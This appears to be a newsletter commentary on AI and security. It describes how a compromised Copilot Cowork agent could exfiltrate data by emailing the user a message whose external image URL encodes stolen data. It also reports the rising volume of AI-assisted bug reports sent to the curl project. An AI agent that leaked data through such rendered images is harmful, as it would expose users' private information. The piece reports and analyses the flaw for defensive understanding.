Microsoft Copilot Cowork has a data exfiltration problem. Yes, that’s the actual product name.
The issue, flagged by Simon Willison, shows how tricky it is to lock down agentic systems. Copilot Cowork can send emails to the user’s own inbox without asking for approval. That sounds merely annoying until you consider what happens next: those messages can contain external images that trigger network requests when rendered.
An attacker who’s compromised the agent doesn’t need to get data out directly. They just need to get the agent to email the user, embed an image hosted on an attacker-controlled server, and encode the stolen data in the image URL. When the email client renders the message, it makes the request, and the data walks right out.
This is the kind of vulnerability that makes security teams wince. It’s not a dramatic exploit. It’s a design flaw that turns a convenience feature into an exfiltration channel.
The attack surface here is larger than it looks. Email rendering is complex, image prefetching is common, and users expect their own AI assistant to be helpful, not vetted like external input. The combination creates a trust boundary violation that’s hard to spot and harder to defend against.
Meanwhile, Daniel Stenberg and the curl team are dealing with a different kind of AI pressure. The rate of incoming security reports has quadrupled since 2024 and doubled since last year. They’re now getting more than one report per day.
The reports aren’t junk. They’re detailed, credible, and time-consuming to triage. The quality is higher than ever before, which means each one demands serious attention.
This is what happens when AI gets good at finding bugs but doesn’t get proportionally better at understanding context or severity. The tooling lowers the barrier to filing reports, but the human work of evaluating them doesn’t compress. Stenberg notes that for the first time, his wife has commented on the pressure he’s under.
Open source maintainers are already stretched thin. Adding a 4-5x multiplier on security triage without adding resources isn’t sustainable. The curl project is high-profile and critical infrastructure, which makes it a magnet for this kind of attention. But the pattern will spread.
If AI-assisted security research keeps scaling at this rate, we’re going to need AI-assisted triage just to keep up. Or we need to rethink how we fund and staff the projects that everything else depends on.
Both stories point to the same underlying issue: AI is changing the economics of security work, and we haven’t adapted yet.
Copilot Cowork shows that building agentic systems without thinking through every trust boundary is going to hurt. The curl situation shows that democratizing security research without democratizing maintenance capacity is going to hurt too.
Neither problem has an obvious fix. But ignoring them isn’t going to work either.
One email at dawn. The five stories that mattered, with the bits removed and the meaning kept. Free, for now.